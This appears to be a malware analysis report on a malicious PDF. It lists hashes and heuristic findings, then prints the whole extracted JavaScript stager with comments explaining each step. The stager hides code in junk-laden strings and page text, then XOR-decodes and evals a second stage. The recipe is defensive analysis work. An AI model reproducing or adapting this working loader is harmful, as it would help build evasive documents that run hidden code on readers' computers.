Malicious PDF — malware analysis report

Static analysis result for SHA-256 fb7a1be6d675a22e…

Verdict: MALICIOUS

File type: PDF

Size: 6.4 KB. Authoring application: Geheuebozatni (via 52101Tevobeqire) — both values look like generated pseudo-random strings rather than a real authoring tool, so treat them as a weak supporting indicator, not as something to pivot on. First seen: 2026-05-08.
MD5: 80812b4f15b06340fe2fe92a5b02a03a SHA-1: fb62cd2f7c835f1762b1ec2e561c6edbef8651b8 SHA-256: fb7a1be6d675a22ef03606eb694e92f59e43dac7a7cc926abec9c630e84fa189
Risk score: 86

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager — severity: high — rule PDF_PAGE_WORD_XOR_EVAL_STAGER
    The PDF's JavaScript concatenates every word on the page indicated by doc.pageNum (enumerated with getPageNumWords/getPageNthWord), parses the result as hex byte pairs, XORs each byte with 0x33 (51), turns the bytes back into characters via app.eval('nUX=("\xNN");'), stores the last 332 decoded characters in doc.fKZ and the remainder in doc.lMP, then calls a function that is never defined (vOF) so that the catch block runs app.eval(doc.lMP); any other failure is surfaced with app.alert(e.message). The second stage is therefore carried in the page text, not in the /JS object, so a rule on the JavaScript stream alone cannot recover it — extract the page's words, hex-decode, XOR with 0x33 and drop the 332-character trailer to obtain it. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action — severity: low — 1 related finding — rule PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream — severity: low — rule PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis. The carved script is live stager code: handle it only in an isolated analysis environment, and do not open the PDF in a JavaScript-enabled reader outside a sandbox.

Filename | Kind | Source | Size
javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0x122D | 1496 bytes
SHA-256: 3c69d07a7a7d1177a8a5d59ecb21e68c93fada9a4f0894bfc9b7585c139e6925
Preview script
First 1,000 lines of the extracted script (the script is far shorter than that, so the listing below is the whole of it)
// Stage-1 payload, kept as a string with junk characters sprinkled through it so
// that the API names (getPageNthWord, getPageNumWords, eval, join) never appear
// contiguously. eXOF below is exactly the junk alphabet; with it removed the
// string reads, in outline:
//   var dS = this.b;                         // meant to be the Doc (see lW / pWJ)
//   kJEJ = { n:'getPageNthWord', hIT:'getPageNumWords', fWR:'pageNum',
//            hOB:'eval', pEF:'join' }
//   hYF = 51 (0x33) XOR key; rQT = 16 radix; jOJ = 2 chars per byte; rMR = 332
//   vCX = every word of page dS.pageNum concatenated:
//         dS.getPageNthWord(dS.pageNum, i, 1) for i < dS.getPageNumWords(dS.pageNum)
//   for each 2-char hex pair: byte = parseInt(pair, 16) ^ 0x33, re-padded to two
//         hex digits, then app.eval('nUX=("\x' + hex + '");') turns it into a
//         character (an eval-based stand-in for String.fromCharCode; pOV=String
//         is assigned but never used) and nUX is pushed onto rQP
//   tUZ = rQP.join(''); dS.fKZ = last 332 chars; dS.lMP = everything before them
//   vOF();   // never defined anywhere -> always throws, so the catch runs
//            // app.eval(dS.lMP) (guarded by if(dS.lMP))
//   outer catch: app.alert(err.message)
// The decoded stage therefore lives in the page text, not in this /JS object.
// Unused decoys inside the stage: nAN, xMF, hWH, rAR, tIRD, pOV.
// NOTE(review): `this.b` only resolves to the Doc if the host engine binds
// `this` inside the indirect eval to the lW instance / caller frame; that is
// engine-specific — confirm against the target reader's JavaScript engine.
var vW="var dS=this.b;try {var kJEJ={    n : \'getPageNthWor9d\',hIT : \'getPageNuDmWords\',fWR : \'pageNum\',hOB : \'eval\',pE%F : \'join\',};hYF = 51 ;jIB=\'\';vCX=\'9\';bOX=0;pOV=String;lQR=\'\\\\x\';nAN=\'toString\';xUB=1;j_OJ=2;xMF=4;hWH=5;rAR=255;rQT=16;tIRD=\'doc\';rMR=%332;rQP=[];tUZ=q\'\';!fQL=dS[_kJEJ.hI&T](dS[kJEJ.fWR]);for(zEB=bOX;zEB< fQL; zEB++){var nCR=dS[kJEJ.n](dS[kJEJ.fWR],zEB,xUB);vCX=[vCX,nCR][kJEJ.pEF](jIB);;}for(z$EB=0;zEB < vCX.leng_th; zEB+=jO_J){fAX=vCX.substr(zEB,jOJ);hSX=parseInt(fAX,rQT~);bKP=hSX^hqYF;nOZ=#bKP.toS&tring(rQT);nOZ=_(nOZ.length==xUB) ? \'0\' + nOZ : nOZ;app[kJEJ.hOB](\'GnUX=(\"\'+lQR+nOZ+\'\")q;\');rQP#.push(n#UX)#;}try {!tUZ=rQP.join(jIqB);dS.fKZ=(tUZ.!substr(tUZ.length-rMR));dS.lMP=D(tU|Z.substr(bOX,tU$Z.l9engGth-rMR));vOF();} catch(|rKZ){if(dS.%lMP){tr!y {app[%kJEJ.hOB](dS.lMP);} catch(rKZ){}} else {}}} catch(tUZ){app.alert(tUZ.message);}";
// Junk alphabet inserted into vW: % 9 & | $ q D # G ~ _ !  — stripped globally by
// vW.replace(eXOF, '') below. Because ordinary characters (9, q, D, G) are in the
// set, the plaintext stage itself has to avoid them entirely.
var eXOF=/[%9&\|\$qD#G~_\!]/g;
// Constructor for the holder object: stores its argument on .b (read by mFQL as
// the receiver of the eval call) and on the decoy alias .dEZ, which nothing reads.
function lW(yFGL){this.dEZ=this.b=yFGL};
// Property key for the eval lookup in mFQL: a String *object* wrapping "eval",
// which coerces to "eval" when used as this.b[vS] (keeps the bare word out of
// the source as a plain literal).
var vS=new String("eval");

// Captures the `this` the /JS stream runs under; passed to lW below as the
// object whose eval is invoked. NOTE(review): in Acrobat/Reader document-level
// scripting this is the Doc object — confirm for the target reader.
var tIR=this;
// "prototype", split so the word does not appear verbatim.
var qTCF=String("prot"+"otyp"+"e");
// Concatenation helper; never called anywhere in this listing (decoy).
function xS(eLAD,hK){return eLAD+hK};
// "replace": "repla" + "cerqB".substr(0,2) == "replace"; used below as
// vW[vAD](eXOF, jIB) to strip the junk characters out of the stage string.
var vAD=String("repla"+"cerqB".substr(0,2));

// "length" — assigned but never read in this listing (decoy).
var fWN="len"+"gth";
// Empty string: the replacement used when stripping junk from vW.
var jIB='';
// Zero — unused in the outer script (the decoded stage declares its own bOX).
var bOX=0;
;



// Decoy object; never read.
var hOX={hQH:28967};
// Deobfuscation step: vW.replace(eXOF, '') deletes every junk character listed
// in eXOF, leaving runnable stage-1 code in vW.
vW=vW[vAD](eXOF, jIB);


// Noise: writes a couple of properties onto the doc-level `this` and a throwaway
// object; none of them is read later in the listing.
this.fUL="fUL";this.t=18423;this.t++;f={xI:"wJYL"};
;


// lW.prototype.mFQL — the launcher. this.b is the object stored by the lW
// constructor (the doc-level `this`, see pWJ below) and vS coerces to "eval",
// so the one meaningful statement is this.b.eval(vW): an indirect eval of the
// stage-1 string after it has been stripped of junk by vW[vAD](eXOF, jIB).
// The surrounding arithmetic and empty objects are padding.
lW[qTCF].mFQL = function(){
fULQ=14580;fULQ+=235;
// Executes the decoded stage-1 code.
this.b[vS](vW);
fAZ=2215;fAZ+=154;var rG=14320;zABY={};
}

// Decoy strings; never read.
var tGX="tGX";var zUJ="zUJ";

// Holder whose .b is the doc-level `this` captured in tIR; mFQL evals through it.
var pWJ=new lW(tIR);



// Noise arithmetic; nothing reads nQ or bGT.
nQ=3112;nQ+=47;bGT=30643;bGT--;

// Trigger: runs lW.prototype.mFQL on the holder, i.e. evals the stripped stage-1
// string, which in turn decodes the page text and evals stage 2.
pWJ.mFQL();
;